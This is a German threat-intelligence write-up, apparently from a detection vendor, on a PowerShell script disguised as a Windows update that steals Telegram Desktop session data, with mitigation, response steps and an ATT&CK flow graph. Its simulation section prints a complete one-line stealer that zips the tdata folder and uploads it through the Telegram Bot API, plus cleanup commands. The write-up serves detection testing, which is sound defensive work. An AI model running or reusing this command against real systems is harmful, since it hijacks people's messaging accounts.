Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein bösartiges PowerShell-Skript, das auf Pastebin gehostet wird, gibt sich als Windows-Update aus und stiehlt Sitzungsdaten von Telegram Desktop von infizierten Systemen. Das Skript sammelt Hostdetails, komprimiert das Telegram tdata Verzeichnis und extrahiert das resultierende Archiv über die Telegram Bot API. Forscher identifizierten auch einen verwandten webbasierten Stealer, der entwickelt wurde, um Authentifizierungsschlüssel von Telegram Web abzufangen und diese an einen lokalen HTTP-Sammler weiterzuleiten. Beide Tools verlassen sich auf den gleichen Telegram-Bot für Benachrichtigungen, obwohl die verfügbaren Beweise darauf hindeuten, dass sie sich eher in einer Testphase als im großflächigen operationellen Einsatz befinden.
Untersuchung
Analysten fanden zwei auf Pastebin gehostete Skriptvarianten, entdeckten hartkodierte Bot-Tokens und Chat-IDs und rekonstruierten den vollständigen Exfiltrationsprozess. Während der Ausführung beendet das Skript Telegram.exe, archiviert den tdata Ordner und lädt die ZIP-Datei über die Methode sendDocument der API des Bots hoch. Bot-Telemetrie zeigte auch einen separaten webfokussierten Stealer, der MTProto-Authentifizierungsschlüssel an einen privaten Sammler bei 192.168.137.131:5000übermittelte. Insgesamt deuten die Erkenntnisse eher auf funktionale Tests und Validierung als auf eine ausgereifte, groß angelegte Kampagne hin.
Abmilderung
Organisationen, die Telegram nicht benötigen, sollten ausgehenden Datenverkehr zu api.telegram.org und verwandter Telegram-Infrastruktur blockieren. Verteidiger sollten PowerShell auf die Nutzung von Invoke-RestMethod or WebClient bezüglich der Telegram API-Endpunkte überwachen und ZIP-Archive erkennen, die in temporären Verzeichnissen erstellt werden und tdata Inhalte enthalten. Jegliche enthüllten Bot-Tokens sollten sofort widerrufen und ersetzt werden, um weiteren Missbrauch zu verhindern.
Reaktion
Falls das Skript entdeckt wird, beenden Sie den damit verbundenen PowerShell-Prozess und entfernen Sie alle erstellten diag.zip Archive. Widerrufen Sie alle aktiven Telegram-Sitzungen, die mit dem betroffenen Konto verknüpft sind, und aktivieren Sie die Zwei-Faktor-Authentifizierung, um das Risiko eines fortgesetzten Zugriffs zu reduzieren. Der Bot-Token sollte geändert werden, und der verlinkte Bot-Chat sollte auf Anzeichen von exfiltrierten Daten überprüft werden. Eine umfassendere forensische Untersuchung sollte auch bestätigen, ob zusätzliche Anmeldedaten oder Sitzungsmaterialien gesammelt wurden.
"graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Aktionsknoten aktion_user_exec["<b>Aktion</b> – <b>T1204 User Execution</b><br/>Das Opfer führt ein PowerShell-Skript mit dem Namen Windows Telemetry Update aus<br/><b>Technik</b> T1036 Maskierung"] class aktion_user_exec action aktion_powershell_interp["<b>Aktion</b> – <b>T1059.001 PowerShell</b><br/>Skript wird über den PowerShell-Interpreter ausgeführt"] class aktion_powershell_interp action aktion_sysinfo["<b>Aktion</b> – <b>T1082 System Information Discovery</b><br/>Sammelt BENUTZERNAME, COMPUTERNAME und öffentliche IP"] class aktion_sysinfo action aktion_collect_tdata["<b>Aktion</b> – <b>T1005 Daten vom lokalen System</b><br/>Findet Telegram Desktop tdata Verzeichnisse und beendet Telegram.exe"] class aktion_collect_tdata action aktion_archive["<b>Aktion</b> – <b>T1560.001 Archiv via Dienstprogramm</b><br/>Compress-Archive erstellt diag.zip mit gesammelten Dateien"] class aktion_archive action aktion_delete["<b>Aktion</b> – <b>T1070.004 Datei Löschung</b><br/>Löscht diag.zip nach dem Hochladen"] class aktion_delete action aktion_exfiltration["<b>Aktion</b> – <b>T1020 Automatisierte Exfiltration</b><br/>Verwendet den Telegram Bot sendDocument-Endpunkt zur Exfiltration der ZIP-Datei<br/><b>Untertechniken</b> T1041 Exfiltration über C2-Kanäle, T1567 Exfiltration über Webdienste, T1071.001 Webprotokolle"] class aktion_exfiltration action aktion_session_hijack["<b>Aktion</b> – <b>T1563 Fernsteuerungssitzungs-Hijacking</b><br/>Wiedergibt MTProto-Autorisierungsschlüssel aus gesammeltem tdata"] class aktion_session_hijack action aktion_steal_cookies["<b>Aktion</b> – <b>T1550.004 Alternative Authentifizierungsmaterialien nutzen</b><br/>Stiehlt Telegram Web-Sitzungscookies vom Browser-Speicher und leitet sie an den Sammler weiter"] class aktion_steal_cookies action %% Werkzeug / Prozess Knoten werkzeug_powershell["<b>Werkzeug</b> – <b>Name</b>: PowerShell<br/><b>Beschreibung</b>: Windows Kommandozeilen-Shell und Skriptsprache"] class werkzeug_powershell tool werkzeug_compress["<b>Werkzeug</b> – <b>Name</b>: Compress-Archive<br/><b>Beschreibung</b>: PowerShell Cmdlet zum Erstellen von ZIP-Archiven"] class werkzeug_compress tool prozess_telegram["<b>Prozess</b> – <b>Name</b>: Telegram.exe<br/><b>Beschreibung</b>: Desktop-Client für Telegram-Messaging"] class prozess_telegram process werkzeug_telegram_bot["<b>Werkzeug</b> – <b>Name</b>: Telegram Bot API<br/><b>Beschreibung</b>: sendDocument Endpunkt verwendet für Datenexfiltration"] class werkzeug_telegram_bot tool %% Verbindungen, die den Fluss zeigen aktion_user_exec –>|triggert| aktion_powershell_interp aktion_powershell_interp –>|verwendet| werkzeug_powershell aktion_powershell_interp –>|ausführt| aktion_sysinfo aktion_sysinfo –>|sammelt| aktion_collect_tdata aktion_collect_tdata –>|beendet| prozess_telegram aktion_collect_tdata –>|verwendet| werkzeug_compress aktion_collect_tdata –>|erstellt| aktion_archive aktion_archive –>|verwendet| werkzeug_compress aktion_archive –>|produziert| aktion_exfiltration aktion_exfiltration –>|verwendet| werkzeug_telegram_bot aktion_exfiltration –>|löscht| aktion_delete aktion_delete –>|räumt auf| aktion_exfiltration aktion_exfiltration –>|ermöglicht| aktion_session_hijack aktion_session_hijack –>|erleichtert| aktion_steal_cookies "
Angriffsfluss
Erkennungen
Rufe verdächtige .NET-Methoden von Powershell (über powershell) auf
Ansehen
Möglicher Missbrauch von Telegram als Command-and-Control-Kanal (über dns_query)
Ansehen
Mögliche Versuche von IP Lookup-Domain-Kommunikationen (über dns)
Ansehen
IOCs (Quell-IP) zur Erkennung: In einem Telegram Session Stealer: Wie ein auf Pastebin gehostetes PowerShell-Skript Desktop- und Web-Sitzungen ins Visier nimmt
Ansehen
IOCs (Ziel-IP) zur Erkennung: In einem Telegram Session Stealer: Wie ein auf Pastebin gehostetes PowerShell-Skript Desktop- und Web-Sitzungen ins Visier nimmt
Ansehen
Erkennung von Telegram Session Stealer über PowerShell-Skript [Windows-Netzwerkverbindung]
Ansehen
Windows Telemetry Update – Telegram Session Stealer [Windows Powershell]
Ansehen
Simulation Ausführung
Voraussetzung: Der Telemetrie- & Baseline Pre-Flight-Check muss bestanden sein.
Begründung: In diesem Abschnitt wird die genaue Ausführung der gegnerischen Technik (TTP) beschrieben, die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und zielen darauf ab, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
- Aufklärung: Der Angreifer fragt
api.ipify.orgab, um die öffentliche IP des Hosts zu entdecken (wird später für das Logging verwendet). - Dienstunterbrechung: Stoppt den legitimen Telegram Desktop-Prozess, um sicherzustellen, dass Dateien nicht gesperrt sind.
- Datensammlung: Kopiert rekursiv das Telegram Desktop
tdataVerzeichnis (Sitzungsdateien) an einen temporären Ort. - Archivierung: Komprimiert die gesammelten Daten in
diag.zip. - Exfiltration: Sendet das Archiv an einen bösartigen Telegram Bot via
Invoke-RestMethod. - Aufräumen: Löscht das temporäre Archiv und startet Telegram optional neu.
- Aufklärung: Der Angreifer fragt
-
Regressionstest-Skript: Führt die gesamte Angriffskette in einer einzigen PowerShell-Befehlszeile aus (entsprechend der Erkennungsregel).
# Windows Telemetry Update – Telegram Session Stealer $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Aufräumbefehle: Stellt die Umgebung in ihren ursprünglichen Zustand wieder her.
# Start Telegram (wenn gewünscht) neu und entfernen Sie kopierte Daten Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;